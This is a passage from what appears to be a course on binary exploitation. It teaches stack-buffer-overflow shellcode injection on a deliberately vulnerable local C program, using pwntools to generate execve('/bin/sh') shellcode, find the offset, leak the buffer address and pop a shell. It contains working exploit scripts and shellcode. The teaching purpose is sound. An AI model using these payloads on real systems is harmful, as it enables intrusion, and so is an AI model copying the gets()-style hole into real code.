Definition

We've seen in the previous part that we can redirect the normal execution flow to other functions already present in the binary. But in real binaries, there should not be a win() function that you can exploit.

So what if we want to execute our own code ?

This is what we'll learn in this part, using shellcode.

A shellcode is a small piece of code, consisting of assembly instructions.

It is written in hexadecimal format, with op codes (operation codes), and looks something like this :

\x01\x02\x03\x04\0x05\0x6 ...

What can we do

With a shellcode, anything is possible ! All instructions are supported, so we could for example open a shell /bin/sh.

Why does it work

Injecting shellcode and executing it works because of the Von Neumann architecture, which does not make any difference between data and instructions.

So anything pointed by the EIP will be executed, even if it comes from user input. As long as it looks just like assembly instructions, it will be executed.

How to use it

So basically, just a sequence of assembly opcodes.

And a basic overview of an exploit using shellcode consists of :

input the shellcode onto the stack
overwrite EIP to point to the shellcode
shellcode is executed

Why use a shellcode

It's small, and most of the time, a buffer overflow won't allow a lot of space
You can do anything with it, as long as you can write it

ASLR

ASLR (for Address Space Layout Randomization) is a security technique that randomizes memory mapping when running a binary. It does not directly prevent shellcode execution, but it may make it harder (because of memory randomization). We will discuss that in details later.

For this course, to ease our learning, the address of the vulnerable buffer will always be provided.

But you must know that it is generally enabled, but can be bypassed.

Generating a shellcode

We will learn how to write our own shellcode at some point, but for now, we will use pwntools shellcraft to generate a shellcode.

online shellcodes

Please, do not execute shellcodes from the Internet.
As explained, we can do anything with a shellcode, and they can be very dangerous. Shellcodes from pwntools are safe, and they will be enough.

Open python in REPL (read execute print loop) mode from bash

➜  ~ python3
Python 3.11.1 (main, Dec 31 2022, 10:23:59) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

Import pwntools

>>> from pwn import *

Generate a shellcode for a shell

>>> shellcraft.sh()
"    /* execve(path='/bin///sh', argv=['sh'], envp=0) */\n    /* push b'/bin///sh\\x00' */\n    push 0x68\n    push 0x732f2f2f\n    push 0x6e69622f\n    mov ebx, esp\n    /* push argument array ['sh\\x00'] */\n    /* push 'sh\\x00\\x00' */\n    push 0x1010101\n    xor dword ptr [esp], 0x1016972\n    xor ecx, ecx\n    push ecx /* null terminate */\n    push 4\n    pop ecx\n    add ecx, esp\n    push ecx /* 'sh\\x00' */\n    mov ecx, esp\n    xor edx, edx\n    /* call execve() */\n    push SYS_execve /* 0xb */\n    pop eax\n    int 0x80\n"
>>>

Pretty print the shellcode

>>> print(shellcraft.sh())
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80

>>>

So this is a simple shellcode generated by pwntools, and when executed, a shell will open.

Convert the shellcode to assembly

>>> asm(shellcraft.sh())
b'jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80'
>>>

This is the shellcode in a format that can be injected in a payload.

We can also print the shellcode in a hexadecimal format

>>> print(hexdump(asm(shellcraft.sh())))
00000000  6a 68 68 2f  2f 2f 73 68  2f 62 69 6e  89 e3 68 01  │jhh/│//sh│/bin│··h·│
00000010  01 01 01 81  34 24 72 69  01 01 31 c9  51 6a 04 59  │····│4$ri│··1·│Qj·Y│
00000020  01 e1 51 89  e1 31 d2 6a  0b 58 cd 80               │··Q·│·1·j│·X··│
0000002c
>>>

Guided example

#include <stdio.h>

void pwnme()
{
    char buffer[100];
    printf("buffer is at %p\n", &buffer);
    puts("overflow me");
    gets(buffer);
}

int main()
{
    pwnme();
    return 0;
}

Copy paste the above code into a main.c file.
Then compile it with gcc -m32 -no-pie -z execstack main.c -o main

New stack layout

Just like in ret2win section, we have a buffer that can be overflowed with user input coming from gets().

However, this time, there is no win() function, no flag to print.

The goal here is to inject our own shellcode, point to it, and execute it.

Finding the padding should be trivial by now, we'll be using another technique to automate that inside the process.

from pwn import *

target = './main'

elf = context.binary = ELF(target)

def find_offset() -> int:
    p = process()
    p.sendline(cyclic(200))
    p.wait()
    core = Coredump('./core')
    offset = cyclic_find(core.fault_addr)
    return offset

padding = find_offset() # should be 112 bytes

However this time, we need to inject our shellcode onto the stack.

images

So our payload should look like :

[shellcode] + [padding] + [ptr to shellcode]

Finding the address of buffer

This section will demonstrate the purpose of ASLR. ASLR is disabled inside GDB, so the address of the buffer should always be the same when checking inside GDB. However, when we run the binary multiple times, it shows a different one.

➜  ~ ./main
buffer is at 0xffe6372c
overflow me
^C
➜  ~ ./main
buffer is at 0xffc44e4c
overflow me
^C
➜  ~ ./main
buffer is at 0xffc0a1fc
overflow me
^C

Open the binary in gdb

gdb main

Put a breakpoint on the gets() call (find the offset yourself, you should know now)

pwndbg> b *pwnme + 65

Run the binary

pwndbg> r

Get the address of the buffer

► 0x80491c3 <pwnme+65>    call   gets@plt                     <gets@plt>
        arg[0]: 0xffffd5cc ◂— 0xd /* '\r' */
        arg[1]: 0xffffd5cc ◂— 0xd /* '\r' */
        arg[2]: 0xf7fca410 —▸ 0x80482b9 ◂— 'GLIBC_2.0'
        arg[3]: 0x804918e (pwnme+12) ◂— add ebx, 0x2e72

question

What is the address of the buffer ?

Hint

Check the arguments to `gets()`

Answer

It's 0xffffd5cc

Writing the exploit

In python:

from pwn import *

target = './main'

elf = context.binary = ELF(target)

padding = 112
shellcode = asm(shellcraft.sh())

payload = shellcode                            # [shellcode]
payload += b'A' * (padding - len(shellcode))   # [padding]
payload += p32(0xffffd5cc)                     # [ptr to shellcode]

p = process()
print(p.clean())
p.sendline(payload)
p.interactive()                                 # to interact with the shell

Run it :

➜  ~ python3 exploit.py
[*] '/root/main'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
[+] Starting local process '/root/main': pid 1474
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1474)
[+] Parsing corefile...: Done
[*] '/root/core'
    Arch:      i386-32-little
    EIP:       0x62616164
    ESP:       0xffa80cb0
    Exe:       '/root/main' (0x8048000)
    Fault:     0x62616164
[+] Starting local process '/root/main': pid 1484
b'buffer is at 0xff9e36cc\noverflow me\n'  # <---- buffer is at 0xff9e36cc
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ 
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1484)

It failed, obviously because our address found inside GDB is different from the real address of the buffer.

We can just retrieve that address programmatically by adding a few lines inside our exploit :

from pwn import *

target = './main'

elf = context.binary = ELF(target)

def find_offset() -> int:
    p = process()
    p.sendline(cyclic(200))
    p.wait()
    core = Coredump('./core')
    offset = cyclic_find(core.fault_addr)
    return offset

padding = find_offset() # should be 112 bytes

shellcode = asm(shellcraft.sh())

p = process()
p.recvuntil('at ')      # we discard output 'buffer is at '
leaked_address = p.recvline()[:-1]  # we receive the rest of the output, which is the address, and we remove the last part '\n'
address = int(leaked_address, 0)    # we convert the string address into an int, which can be used by p32()

payload = shellcode
payload += b'A' * (padding - len(shellcode))
payload += p32(address)
print(p.clean())
p.sendline(payload)
p.interactive()

➜  ~ python3 exploit.py 
[*] '/root/main'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments
[+] Starting local process '/root/main': pid 1503
[*] Process '/root/main' stopped with exit code -11 (SIGSEGV) (pid 1503)
[+] Parsing corefile...: Done
[*] '/root/core'
    Arch:      i386-32-little
    EIP:       0x62616164
    ESP:       0xffb881d0
    Exe:       '/root/main' (0x8048000)
    Fault:     0x62616164
[+] Starting local process '/root/main': pid 1513
/root/exploit.py:20: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.recvuntil('at ')      # we discard output 'buffer is at '
b'overflow me\n'
[*] Switching to interactive mode
$ ls
core  exploit.py  flag.txt  main  main.c

Congratz, you popped your first shell 🎉

Troubleshooting

If you have the error "core file not found", it's because you may be running on Ubuntu, and your Coredump file is generated elsewhere. To fix that (just for this course), you need to run the following commands on your host machine (outside of your docker container):

echo core | sudo tee /proc/sys/kernel/core_pattern
echo 0 | sudo tee /proc/sys/kernel/core_uses_pid

Definition

What can we do​

Why does it work​

How to use it​

Why use a shellcode​

ASLR​

Generating a shellcode​

Guided example​

New stack layout​

Finding the address of buffer​

Writing the exploit​

Troubleshooting​